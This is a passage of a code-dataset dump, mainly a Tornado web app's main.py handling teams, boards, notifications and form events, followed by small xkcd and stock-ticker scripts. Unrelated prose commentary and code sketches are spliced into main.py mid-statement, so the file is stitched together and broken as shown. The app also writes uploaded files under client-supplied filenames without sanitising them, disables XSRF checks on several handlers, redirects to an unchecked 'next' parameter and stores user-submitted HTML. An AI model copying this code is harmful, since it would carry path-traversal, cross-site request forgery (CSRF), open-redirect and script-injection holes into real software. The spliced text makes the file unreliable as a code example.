:(\n\t\t\t\tdb_sess.delete(team)\n\t\t\t\tdb_sess.commit()\n\t\t\t\tself.redirect(f\"/{self.current_user}/teams\")\n\t\t\t\treturn\n\t\t\tdb_sess.commit()\n\t\t\treturn self.render(\"edit_team.html\", title=team.title, result=self.get_res_sort(db_sess, team), team=team)\n\n\t\tif s:\n\t\t\tres = db_sess.query(User).filter(User.username.like(f\"%{s}%\"), User.id != self.current_user.id).all()\n\t\telse:\n\t\t\tres = db_sess.query(User).filter(User.id != self.current_user.id).all()\n\t\tkeys = []\n\t\tfor user in res:\n\t\t\tif user in team.users:\n\t\t\t\tkeys.insert(0, user)\n\t\t\telse:\n\t\t\t\tkeys.append(user)\n\t\tres_sort = {}\n\t\tfor key in keys:\n\t\t\tif key in team.users:\n\t\t\t\tres_sort[key] = 1\n\t\t\telse:\n\t\t\t\tres_sort[key] = 0\n\t\t# Adding members (from checkboxes values)\n\t\ttry:\n\t\t\t_ = self.get_argument(\"btn2\")\n\t\texcept Exception:\n\t\t\t_ = None\n\t\tif _ is not None:\n\t\t\t# User saves changes\n\t\t\t# In general, the list has not changed, so we can handle it right like this\n\t\t\tfor user in res_sort:\n\t\t\t\ttry:\n\t\t\t\t\t__ = self.get_body_argument(user.username)\n\t\t\t\texcept Exception:\n\t\t\t\t\t__ = None\n\t\t\t\tif __ == \"on\" and user not in team.users:\n\t\t\t\t\tawait append_to_team(user, team)\n\t\t\t\t\tres_sort[user] = 1\n\t\t\t\telif __ is None and user in team.users:\n\t\t\t\t\tteam.users.remove(user)\n\t\t\t\t\tres_sort[user] = 0\n\t\tdb_sess.commit()\n\t\treturn self.render(\"edit_team.html\", title=team.title, result=res_sort, text=s, team=team)\n\n\nclass TeamLeaveHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tteam = self.get_team(self.request.uri.split('/')[-2], db_sess)\n\t\tif not team:\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tif self.current_user.id == team.chief:\n\t\t\tself.write_error(403)\n\t\t\treturn\n\t\tcurrent_user = self.get_user(self.current_user.username, db_sess)\n\t\tif current_user not in team.users:\n\t\t\tself.write_error(403)\n\t\t\treturn\n\t\tteam.users.remove(current_user)\n\t\tdb_sess.commit()\n\t\tself.redirect(f\"/{current_user.username}/teams\")\n\n\nclass CreateTeamHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tif self.current_user.username != self.request.uri.split('/')[-2]:\n\t\t\tself.write_error(403)\n\t\t\treturn\n\t\tform = TeamRegisterForm(self.request.arguments)\n\t\tawait self.render(\"create_team.html\", title=\"Creating team\", form=form, message_title=None)\n\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tform = TeamRegisterForm(self.request.arguments)\n\t\tform.chief.data = self.current_user.id\n\t\tif form.validate():\n\t\t\tdb_sess = db_session.create_session()\n\t\t\tif self.get_team(form.title.data, db_sess):\n\t\t\t\tawait self.render(\n\t\t\t\t\t\"create_team.html\", title=\"Creating team\", form=form,\n\t\t\t\t\tmessage_title=f\"Title {form.title.data} is already taken\")\n\t\t\t\treturn\n\t\t\tteam = Team(\n\t\t\t\tchief=form.chief.data,\n\t\t\t\ttitle=form.title.data\n\t\t\t)\n\t\t\tdb_sess.add(team)\n\t\t\tdb_sess.commit()\n\t\t\tself.redirect(f\"/{self.current_user.username}/teams\")\n\t\tawait self.render(\"create_team.html\", title=\"Creating team\", form=form, message_title=None)\n\n\nclass UserInBoxHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tawait self.render(\"inbox.html\", title=\"Notifications\", notifications=self.current_user.notifications[::-1])\n\n\nclass 
UserInBoxCheckHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tdb_sess = db_session.create_session()\n\t\tuser = self.get_user(self.current_user.username, db_sess)\n\t\tfor i in range(len(user.notifications)):\n\t\t\tif self.get_argument(\"ntf\" + str(i), None) is not None:\n\t\t\t\tuser.notifications[i].is_read = True\n\t\tdb_sess.add(user)\n\t\tdb_sess.commit()\n\t\tself.redirect(f\"/{self.current_user.username}/inbox\")\n\n\nclass UserInBoxDeleteHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tdb_sess = db_session.create_session()\n\t\tuser = self.get_user(self.current_user.username, db_sess)\n\t\ti = 0\n\t\twhile i < len(user.notifications):\n\t\t\tif self.get_argument(\"ntf\" + str(i), None) is not None:\n\t\t\t\tdb_sess.delete(user.notifications[i])\n\t\t\t\tdel user.notifications[i]\n\t\t\t\tdb_sess.add(user)\n\t\t\t\tdb_sess.commit()\n\t\t\t\ti -= 1\n\t\t\ti += 1\n\t\tself.redirect(f\"/{self.current_user.username}/inbox\")\n\n\nclass InviteTeamHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tss = self.request.uri.split('/')[-1].split('_____')\n\t\tif self.current_user.email == confirm_token(ss[0]):\n\t\t\tdb_sess = db_session.create_session()\n\t\t\tuser = self.get_user(self.current_user.username, db_sess)\n\t\t\tteam = self.get_team(ss[1], db_sess)\n\t\t\tif user not in team.users:\n\t\t\t\tif user.id != team.chief:\n\t\t\t\t\t# Add user to team\n\t\t\t\t\tteam.users.append(user)\n\t\t\t\t\tdb_sess.add(team)\n\t\t\t\t\t# Delete notification\n\t\t\t\t\tmsg = db_sess.query(Notification).filter(\n\t\t\t\t\t\tNotification.timestamp == ss[2].replace('%20', ' ')).first()\n\t\t\t\t\tif not msg or (msg not in user.notifications):\n\t\t\t\t\t\tself.write_error(404)\n\t\t\t\t\t\treturn\n\t\t\t\t\tdb_sess.delete(msg)\n\t\t\t\t\tdel user.notifications[user.notifications.index(msg)]\n\t\t\t\t\tdb_sess.add(user)\n\t\t\t\t\t# And... 
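generate_confirmation_token and confirm_token are imported from elsewhere in the project, so their definitions are not visible in this file. A common way to implement the pair is itsdangerous' URLSafeTimedSerializer; the sketch below is an assumption about their shape, not the project's actual helpers, and SECRET_KEY and SALT are placeholders:

from itsdangerous import URLSafeTimedSerializer

SECRET_KEY = "change-me"   # placeholder, not the app's real secret
SALT = "email-confirm"     # placeholder salt

def generate_confirmation_token(email):
    # Sign the email into a URL-safe token that can ride inside a link.
    return URLSafeTimedSerializer(SECRET_KEY).dumps(email, salt=SALT)

def confirm_token(token, max_age=3600):
    # Raises BadSignature / SignatureExpired on tampering or expiry, which
    # the handlers above catch as a generic Exception and turn into a 404.
    return URLSafeTimedSerializer(SECRET_KEY).loads(token, salt=SALT, max_age=max_age)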
Commit db!\n\t\t\t\t\tdb_sess.commit()\n\t\t\t\t\tawait notify_join_team(db_sess.query(User).filter(User.id == team.chief).first(), team)\n\t\t\t\t\tself.redirect(f\"/{user.username}/inbox\")\n\t\t\t\t\treturn\n\t\tself.write_error(404)\n\n\ndef get_admin(id_a: int):\n\tdb_sess = db_session.create_session()\n\treturn db_sess.query(User).filter(User.id == id_a).first()\n\n\nclass BoardViewHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboard = self.get_board(self.request.uri.split('/')[-2], db_sess)\n\t\tif not board:\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tuser = self.get_user(self.current_user.username, db_sess)\n\n\t\tawait self.render(\n\t\t\t\"board_view.html\", title=board.title, board=board, get_admin=get_admin,\n\t\t\tflag=False, u=user, choice=random.choice)\n\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboard = self.get_board(self.request.uri.split('/')[-2], db_sess)\n\t\tuser = self.get_user(self.current_user.username, db_sess)\n\t\tawait join_to_board(user, board)\n\n\t\tawait self.render(\n\t\t\t\"board_view.html\", title=board.title, board=board, get_admin=get_admin,\n\t\t\tflag=True, u=user, choice=random.choice)\n\n\nclass InviteBoardHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tss = self.request.uri.split('/')[-1].split('_____')\n\t\tif self.current_user.email == confirm_token(ss[0]):\n\t\t\tdb_sess = db_session.create_session()\n\t\t\tuser = self.get_user(self.current_user.username, db_sess)\n\t\t\tuser_asked = self.get_user(ss[3], db_sess)\n\t\t\tboard = self.get_board(ss[1], db_sess)\n\t\t\tif user_asked not in board.board_users:\n\t\t\t\t# Add user to team\n\t\t\t\tboard.board_users.append(user_asked)\n\t\t\t\tdb_sess.add(board)\n\t\t\t\t# Delete notification\n\t\t\t\tmsg = db_sess.query(Notification).filter(\n\t\t\t\t\tNotification.timestamp == ss[2].replace('%20', ' ')).first()\n\t\t\t\tif not msg or (msg not in user.notifications):\n\t\t\t\t\tself.write_error(404)\n\t\t\t\t\treturn\n\t\t\t\tdb_sess.delete(msg)\n\t\t\t\tdel user.notifications[user.notifications.index(msg)]\n\t\t\t\tdb_sess.add(user)\n\t\t\t\t# And... 
Commit db!\n\t\t\t\tdb_sess.commit()\n\t\t\t\tawait notify_join_board(user_asked, board)\n\t\t\t\tself.redirect(f\"/{user.username}/inbox\")\n\t\t\t\treturn\n\t\tself.write_error(404)\n\n\nclass CreateBoardHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tif self.current_user.username != self.request.uri.split('/')[-2]:\n\t\t\tself.write_error(403)\n\t\t\treturn\n\t\tform = FormBoardsCreate(self.request.arguments)\n\t\tawait self.render(\"create_board.html\", title=\"Creating board\", form=form, message_title=None)\n\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tform = FormBoardsCreate(self.request.arguments)\n\t\tform.admin.data = self.current_user.id\n\t\tif form.validate():\n\t\t\tdb_sess = db_session.create_session()\n\t\t\tif self.get_board(form.title.data, db_sess):\n\t\t\t\tawait self.render(\n\t\t\t\t\t\"create_board.html\", title=\"Creating board\", form=form,\n\t\t\t\t\tmessage_title=f\"Title {form.title.data} is already taken\")\n\t\t\t\treturn\n\t\t\tboard = Boards(\n\t\t\t\ttitle=form.title.data,\n\t\t\t\tabout_board=form.about_board.data,\n\t\t\t\tadmin=form.admin.data, )\n\t\t\tdb_sess.add(board)\n\t\t\tdb_sess.commit()\n\t\t\tself.redirect(f\"/{self.current_user.username}/boards\")\n\t\tawait self.render(\"create_board.html\", title=\"Creating board\", form=form, message_title=None)\n\n\nclass BoardEditHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboard = self.get_board(self.request.uri.split('/')[-2], db_sess)\n\t\tif not board:\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tif self.current_user.id != board.admin:\n\t\t\tself.write_error(403)\n\t\t\treturn\n\t\tthreads = db_sess.query(Threads).all()\n\t\tdict_ts = await self.get_dict_t(threads, board)\n\n\t\tawait self.render(\"edit_board.html\", title=board.title, board=board, get_admin=get_admin, dict_threads=dict_ts)\n\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboard = self.get_board(self.request.uri.split('/')[-2], db_sess)\n\t\tthreads = db_sess.query(Threads).all()\n\n\t\tfor thread in threads:\n\t\t\tif self.get_argument(f\"btn-check-{thread.id}\", None) is None:\n\t\t\t\tif thread in board.board_threads:\n\t\t\t\t\t# Delete thread\n\t\t\t\t\tdel board.board_threads[board.board_threads.index(thread)]\n\t\t\t\t\tdb_sess.add(board)\n\t\t\telse:\n\t\t\t\tif thread not in board.board_threads:\n\t\t\t\t\t# Add thread\n\t\t\t\t\tboard.board_threads.append(thread)\n\t\t\t\t\tdb_sess.add(board)\n\n\t\tfor user in board.board_users:\n\t\t\tif self.get_argument(f\"check-box-{user.username}\", None) is None:\n\t\t\t\t# Delete user...\n\t\t\t\tdel board.board_users[board.board_users.index(user)]\n\t\t\t\tdb_sess.add(board)\n\n\t\tif self.get_argument(\"about_board\", None) is not None:\n\t\t\t# Change board status\n\t\t\tboard.about_board = self.get_argument(\"about_board\", None)\n\t\t\tdb_sess.add(board)\n\n\t\tdb_sess.commit()\n\t\tdict_ts = await self.get_dict_t(threads, board)\n\n\t\tawait self.render(\"edit_board.html\", title=board.title, board=board, get_admin=get_admin, dict_threads=dict_ts)\n\n\nclass BoardDeleteHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboard = self.get_board(self.request.uri.split('/')[-2], db_sess)\n\t\tif board and (self.current_user.id == board.admin):\n\t\t\t# Delete board 
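One caveat in BoardEditHandler.post above: the user-removal loop deletes from board.board_users while iterating over that same collection, and Python's list iterator then skips the element that slides into the freed slot, so adjacent unchecked users can survive the purge. A standalone sketch of the safe pattern, iterating over a copy:

# Deleting from a list while iterating over it skips elements; iterate
# over a shallow copy and mutate the original instead.
board_users = ["ann", "bob", "eve"]   # stand-ins for User records
checked = {"eve"}                     # usernames whose checkbox came back on

for user in list(board_users):        # list(...) copies, so removal is safe
    if user not in checked:
        board_users.remove(user)

assert board_users == ["eve"]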
(\n\t\t\tdb_sess.delete(board)\n\t\t\tdb_sess.commit()\n\t\t\tself.redirect(f\"/{self.current_user.username}/boards\")\n\t\t\treturn\n\t\tself.write_error(404)\n\n\nclass BoardLeaveHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboard = self.get_board(self.request.uri.split('/')[-2], db_sess)\n\t\tcurrent_user = self.get_user(self.current_user.username, db_sess)\n\t\tif board and current_user and (current_user in board.board_users):\n\t\t\tdel board.board_users[board.board_users.index(current_user)]\n\t\t\tdb_sess.add(board)\n\t\t\tdb_sess.commit()\n\t\t\tself.redirect(f\"/{self.current_user.username}/boards\")\n\t\t\treturn\n\t\tself.write_error(404)\n\n\nclass BoardFloodHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboard = self.get_board(self.request.uri.split('/')[-2], db_sess)\n\t\tif not board:\n\t\t\tself.write_error(404)\n\t\tcurrent_user = self.get_user(self.current_user.username, db_sess)\n\t\tmsg_buffer_json = []\n\t\tfor m in board.messages_buffer:\n\t\t\tmsg_buffer_json.append(json.loads(json.dumps(m, cls=AlchemyEncoder)))\n\t\tif current_user in board.board_users or current_user.id == board.admin:\n\t\t\tawait self.render(\"flood.html\", messages=msg_buffer_json, title=f\"{board.title} flood\", b=board)\n\t\t\treturn\n\t\tself.write_error(404)\n\n\nclass MessageNewHandler(BaseHandler, ABC):\n\t\"\"\"Post a new message to the chat room.\"\"\"\n\n\t@staticmethod\n\tdef append_message(board: Boards, message: Message, db_s):\n\t\tboard.messages_buffer.append(message)\n\t\tif len(board.messages_buffer) > CACHE_SIZE:\n\t\t\tmsg_delete = db_s.query(Message).filter(Message.id == board.messages_buffer[0].id).first()\n\t\t\tdel board.messages_buffer[0]\n\t\t\tdb_s.delete(msg_delete)\n\n\t@tornado.web.authenticated\n\tdef post(self):\n\t\tdb_sess = db_session.create_session()\n\t\tmessage = Message(sender_id=self.current_user.id, body=str(self.get_argument(\"body\"))[:200])\n\t\t# render_string() returns a byte string, which is not supported\n\t\t# in json, so we must convert it to a character string.\n\t\tmessage.html = tornado.escape.to_unicode(self.render_string(\n\t\t\t\"message.html\", message=json.loads(json.dumps(message, cls=AlchemyEncoder))))\n\t\tboard = self.get_board(self.request.uri.split('/')[-3], db_sess)\n\t\tif not board:\n\t\t\tself.write_error(403)\n\t\t\treturn\n\t\tif self.get_argument(\"next\", None):\n\t\t\tself.redirect(self.get_argument(\"next\"))\n\t\telse:\n\t\t\tpass\n\t\tdb_sess.add(message)\n\t\tself.append_message(board, message, db_sess)\n\t\tdb_sess.commit()\n\n\nclass AjaxHandler(tornado.web.RequestHandler, ABC):\n\t\"\"\"Simple, ajax handler\"\"\"\n\n\tdef get(self, *args, **kwargs):\n\t\t\"\"\"Get unlikely to be used for ajax\"\"\"\n\t\tself.write_error(403) # Not allowed!\n\t\tself.finish()\n\n\tdef post(self, *args):\n\t\t\"\"\"Example handle ajax post\"\"\"\n\t\t# useful code goes here\n\t\tself.write(json.dumps({'status': 'ok', 'sent': tornado.escape.json_decode(self.request.body)}))\n\t\tself.finish()\n\n\nclass UserEventCreateHandler(BaseHandler, ABC):\n\tdef check_xsrf_cookie(self):\n\t\tpass\n\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboard = self.get_board(self.request.uri.split('/')[-3], db_sess)\n\t\tif board:\n\t\t\tawait self.render(\n\t\t\t\t\"create_event.html\", title=\"Creation a new user event\", board=board, 
url=self.request.uri)\n\n\tdef upload_file(self):\n\t\tf = self.request.files['file'][-1]\n\t\twith open(f\"static/img/forms_uploads/{f['filename']}\", mode='wb') as file:\n\t\t\tfile.write(f['body'])\n\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tif self.request.body_arguments and self.request.body:\n\t\t\tdb_sess = db_session.create_session()\n\t\t\tboard = self.get_board(self.request.uri.split('/')[-3], db_sess)\n\t\t\tnew_event = UserEvents(board=board.id)\n\t\t\tnew_event.html = ''.join(\n\t\t\t\t[self.request.body_arguments[key][0].decode() for key in self.request.body_arguments])\n\t\t\tnew_event.title = new_event.html.split(\n\t\t\t\t'
')[1].split('
')[0]\n\t\t\tnew_event.about = new_event.html.split(\n\t\t\t\t'
')[1].split('
')[0]\n\t\t\tdb_sess.add(new_event)\n\t\t\tdb_sess.commit()\n\t\telse:\n\t\t\tself.upload_file()\n\n\nclass TeamEventCreateHandler(BaseHandler, ABC):\n\tdef check_xsrf_cookie(self):\n\t\tpass\n\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboard = self.get_board(self.request.uri.split('/')[-3], db_sess)\n\t\tif board:\n\t\t\tawait self.render(\n\t\t\t\t\"create_event.html\", title=\"Creation a new team event\", board=board, url=self.request.uri)\n\n\tdef upload_file(self):\n\t\tf = self.request.files['file'][-1]\n\t\twith open(f\"static/img/forms_uploads/{f['filename']}\", mode='wb') as file:\n\t\t\tfile.write(f['body'])\n\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tif self.request.body_arguments and self.request.body:\n\t\t\tdb_sess = db_session.create_session()\n\t\t\tboard = self.get_board(self.request.uri.split('/')[-3], db_sess)\n\t\t\tnew_event = TeamEvents(board=board.id)\n\t\t\tnew_event.html = ''.join(\n\t\t\t\t[self.request.body_arguments[key][0].decode() for key in self.request.body_arguments])\n\t\t\tnew_event.title = new_event.html.split(\n\t\t\t\t'
')[1].split('
')[0]\n\t\t\tnew_event.about = new_event.html.split(\n\t\t\t\t'
')[1].split('
')[0]\n\t\t\tdb_sess.add(new_event)\n\t\t\tdb_sess.commit()\n\t\telse:\n\t\t\tself.upload_file()\n\n\nclass UserEventHandler(BaseHandler, ABC):\n\tdef check_xsrf_cookie(self):\n\t\tpass\n\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\te = self.get_user_event(self.request.uri.split('/')[-1], db_sess)\n\t\tcurrent_user = self.get_user(self.current_user.username, db_sess)\n\t\tif current_user in e.users:\n\t\t\tself.write(\"You already got your answer.\")\n\t\t\treturn\n\t\tawait self.render(\"event.html\", title=e.title[:25].replace(' ', ' '), event=e, url=self.request.uri)\n\n\tasync def post(self):\n\t\tdb_sess = db_session.create_session()\n\t\tevent = self.get_user_event(self.request.uri.split('/')[-1], db_sess)\n\t\tif not event:\n\t\t\treturn\n\t\tcurrent_user = self.get_user(self.current_user.username, db_sess)\n\t\tres = [self.request.body_arguments[key][0].decode() for key in self.request.body_arguments]\n\t\tres_dict = {}\n\t\ti = 0\n\t\twhile i < len(res) - 1:\n\t\t\tres_dict[res[i]] = res[i + 1]\n\t\t\ti += 2\n\t\tif current_user not in event.users:\n\t\t\t# User's answers are ready, now post!\n\t\t\tevent.users.append(current_user)\n\t\t\tdb_sess.add(event)\n\t\t\tdb_sess.commit()\n\t\t\twith open('auto/answers.json', mode='r', encoding='utf-8') as f:\n\t\t\t\tdata = json.load(f)\n\t\t\tif str(event.id) in data[\"user_answers\"]:\n\t\t\t\tdata['user_answers'][str(event.id)].append({current_user.username: res_dict})\n\t\t\telse:\n\t\t\t\tdata['user_answers'][event.id] = [{current_user.username: res_dict}]\n\t\t\twith open('auto/answers.json', mode='w', encoding='utf-8') as file:\n\t\t\t\tjson.dump(data, file)\n\t\telse:\n\t\t\tself.write(\"You already got your answer.\")\n\n\nclass TeamEventHandler(BaseHandler, ABC):\n\tdef check_xsrf_cookie(self):\n\t\tpass\n\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\te = self.get_team_event(self.request.uri.split('/')[-1], db_sess)\n\t\tawait self.render(\"event.html\", title=e.title[:25], event=e, url=self.request.uri)\n\n\tasync def post(self):\n\t\tpass\n\n\nclass UserEventAnswersView(BaseHandler, ABC):\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tevent = self.get_user_event(self.request.uri.split('/')[-1], db_sess)\n\t\tboard = None\n\t\tres = []\n\t\tfor b in db_sess.query(Boards).all():\n\t\t\tif event in b.user_events:\n\t\t\t\tboard = b\n\t\tif not board:\n\t\t\tself.write_error(403)\n\t\tif board.admin != self.current_user.id:\n\t\t\tself.write_error(403)\n\t\twith open('auto/answers.json', mode='r', encoding='utf-8') as f:\n\t\t\tdata = json.load(f)\n\t\ttry:\n\t\t\tres = data[\"user_answers\"][str(event.id)]\n\t\texcept Exception:\n\t\t\tif str(event.id) not in data[\"user_answers\"]:\n\t\t\t\tres = []\n\t\t\telse:\n\t\t\t\t# Oops! 
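The answers store above keys data["user_answers"] by str(event.id) on the read path but by the bare integer event.id on the first write; json.dump happens to coerce integer keys to strings, so the file round-trips, but one consistent key plus setdefault removes both the branch and the reliance on that coercion. A small sketch against the same auto/answers.json layout:

import json

def record_answers(path, event_id, username, answers):
    # Read-modify-write of the answers file, keyed consistently by str(id).
    with open(path, mode='r', encoding='utf-8') as f:
        data = json.load(f)
    data["user_answers"].setdefault(str(event_id), []).append({username: answers})
    with open(path, mode='w', encoding='utf-8') as f:
        json.dump(data, f)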
We don't exist!\n\t\t\t\tself.write_error(404)\n\t\tawait self.render(\n\t\t\t\"forms_answers_view.html\", answers=res,\n\t\t\ttitle=\"Check \" + event.title[:20], event=event)\n\n\nclass TeamEventAnswersView(BaseHandler, ABC):\n\tasync def get(self):\n\t\tpass\n\n\nclass UserEventEditHandler(BaseHandler, ABC):\n\tdef check_xsrf_cookie(self) -> None:\n\t\tpass\n\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tevent = self.get_user_event(self.request.uri.split('/')[-1], db_sess)\n\t\tif not event:\n\t\t\treturn\n\t\tawait self.render(\n\t\t\t\"edit_user_event.html\", event=event, title=\"Edit \" + event.title[:20], url=self.request.uri)\n\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tif self.request.body_arguments and self.request.body:\n\t\t\tdb_sess = db_session.create_session()\n\t\t\tid_ = self.request.uri.split('/')[-1]\n\t\t\tboard = self.get_board(self.request.uri.split('/')[-4], db_sess)\n\t\t\tevent = self.get_user_event(id_, db_sess)\n\t\t\tevent.html = ''.join(\n\t\t\t\t[self.request.body_arguments[key][0].decode() for key in self.request.body_arguments])\n\t\t\tevent.html = event.html.replace(\n\t\t\t\tf'''''', '')\n\t\t\tevent.about = event.html.split(\n\t\t\t\t'
')[1].split('
')[0]\n\t\t\tif event.users:\n\t\t\t\tfor i in event.users:\n\t\t\t\t\tdel event.users[event.users.index(i)]\n\t\t\t\t# delete user's answers from db and json files\n\t\t\t\twith open('auto/answers.json', mode='r', encoding='utf-8') as f:\n\t\t\t\t\tdata = json.load(f)\n\t\t\t\tdata['user_answers'][id_] = []\n\t\t\t\twith open('auto/answers.json', mode='w', encoding='utf-8') as file:\n\t\t\t\t\tjson.dump(data, file)\n\t\t\tdb_sess.add(event)\n\t\t\tdb_sess.commit()\n\n\nclass TeamEventEditHandler(BaseHandler, ABC):\n\tasync def get(self):\n\t\tpass\n\n\nclass ChessHandler(BaseHandler, ABC):\n\tasync def get(self):\n\t\tawait self.render(\"CHESS.html\", title=\"Chess\")\n\n\nclass RunnerHandler(BaseHandler, ABC):\n\tasync def get(self):\n\t\tawait self.render(\"RUNNER.html\", title=\"Runner\")\n\n\nclass ScrollingHandler(BaseHandler, ABC):\n\tasync def get(self):\n\t\tawait self.render(\"SCROLLING.html\", title=\"Scrolling\")\n\n\ndef main():\n\tdb_session.global_init(\"db/Babylonia.db\")\n\tapp = Application()\n\tapp.listen(options.port)\n\ttornado.ioloop.IOLoop.current().start()\n\n\n# class MessageBuffer(object):\n# \tdef __init__(self):\n# \t\tself.cache = []\n# \t\tself.cache_size = 300\n#\n# \tdef get_messages_since(self, cursor):\n# \t\t# IMPORTANT: ``cursor`` should be the ``id`` of the last message received.\n# \t\tresults = []\n# \t\tfor msg in reversed(self.cache):\n# \t\t\tif msg[\"id\"] == cursor:\n# \t\t\t\tbreak\n# \t\t\tresults.append(msg)\n# \t\tresults.reverse()\n# \t\treturn results\n#\n# \tdef add_message(self, message):\n# \t\tself.cache.append(message)\n# \t\tif len(self.cache) > self.cache_size:\n# \t\t\tself.cache = self.cache[-self.cache_size:]\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":40262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"141811221","text":"import json\nimport requests\n# from settings import get_path\nimport os\nimport json\n\nclass database:\n\n def __init__(self):\n # path = os.path.dirname(os.path.realpath(__file__))\n os.makedirs('%s/Data'%os.path.dirname(os.path.realpath(__file__)), exist_ok=True)\n os.makedirs('%s/Images'%os.path.dirname(os.path.realpath(__file__)), exist_ok=True)\n\n\n def get_latest():\n # download newest json into a response object\n try:\n res_obj = requests.get('https://xkcd.com/info.0.json') # this url always contains json for latest comic\n res_obj.close()\n except requests.exceptions.ConnectionError:\n while True:\n print('Latest comic not found.')\n current = input('Type in a number manually:\\n')\n if current.isdecimal() and int(current) > 0:\n break\n\n # extract comic number from json object\n try:\n get_json = res_obj.json() # convert json to python dict\n current = get_json['num']\n\n # if extraction failed, type in a comic number manually\n except json.decoder.JSONDecodeError:\n while True:\n print('Latest comic not found.')\n current = input('Type in a number manually:\\n')\n if current.isdecimal() and int(current) > 0:\n break\n\n return current\n\n\n def get_database():\n # load comic database from json into python dict\n try:\n json_file = open('%s/Data/web_data.json'%os.path.dirname(os.path.realpath(__file__)),encoding='utf-8')\n comic_db = json.load(json_file)\n json_file.close()\n except FileNotFoundError:\n comic_db = {}\n except json.decoder.JSONDecodeError:\n comic_db = {}\n return comic_db\n\n\n def update_database(comic_db):\n json_file = 
open('%s/Data/web_data.json'%os.path.dirname(os.path.realpath(__file__)), 'w',encoding='utf-8')\n json.dump(comic_db, json_file, indent=2)\n json_file.close()\n\n\n def get_path():\n path = os.path.dirname(os.path.realpath(__file__))\n return path\n\n\n def list_images():\n stored_images = os.listdir('%s/Images'%os.path.dirname(os.path.realpath(__file__)))\n return stored_images\n","sub_path":"database_client.py","file_name":"database_client.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"516648380","text":"import os\nimport csv\n\n#extracted and cleaned ticker list\nticker_list, clean_ticker_list = list() , list()\n\n#comple nasdaq company list\nufile = \"/home/atamayo/example_git/final_python/stock_list/companylist.csv\"\n#user current dir\ncwd = os.getcwd()\n#new company csv to read off of\nnew_u_file = \"complete_ticker_list.csv\"\n#complete path file\nabs_file_path = os.path.join(cwd,new_u_file)\n\ndef extract_ticker_symbols(u_file,ext_tix_symbols,clean_ticker_list):\n\twith open(u_file, newline='') as opencsv:\n\t\treader = csv.reader(opencsv,quotechar=',')\n\t\tfor row in reader:\n\t\t\tfor items in row[0:1]:\n\t\t\t\text_tix_symbols.append(items)\n\t\tprint(\"Successfully extracted data\")\n\tfor tix in ext_tix_symbols:\n\t\ttix = tix.replace('\"','')\n\t\tclean_ticker_list.append(tix)\n\tprint('Removed extra quotes')\n\treturn clean_ticker_list\n\n\ndef create_csv_file(new_complete_csv_file,abs_path):\n\t#checkin if csv exists, if not create one!, else we break\n\tfor r,d,f in os.walk(cwd):\n\t\tif not os.path.isfile(abs_file_path):\n\t\t\tprint('file not found, creating new one in current directory named\\n \\\n\t\t\t\tcomplete_ticker_list.csv')\n\t\t\tfp = open(abs_path,'w+')\n\t\t\tfp.close()\n\t\t\tprint(\"created_new_csv file\")\n\t\t\tbreak\n\t\telse:\n\t\t\tprint('found existing file')\n\t\t\tbreak\n\ndef write_to_csv(abs_path,cleaned_tix_symbols):\n\tcleaned_tix_symbols.sort()\n\twith open(abs_path, 'w+') as csvfile:\n\t\tfieldnames = ['TIX_symbols']\n\t\twriter = csv.DictWriter(csvfile,fieldnames=fieldnames)\n\t\twriter.writeheader()\n\n\t\tfor tix in cleaned_tix_symbols:\n\t\t\twriter.writerow({'TIX_symbols': tix})\n\tprint('Successfully wrote tix to new csv file')\n\n\ndef main():\n\tcreate_csv_file(new_u_file,abs_file_path)\n\textract_ticker_symbols(ufile,ticker_list,clean_ticker_list)\n\twrite_to_csv(abs_file_path,clean_ticker_list)\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"stock_list/extract_and_write_to_csv.py","file_name":"extract_and_write_to_csv.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"177800053","text":"from 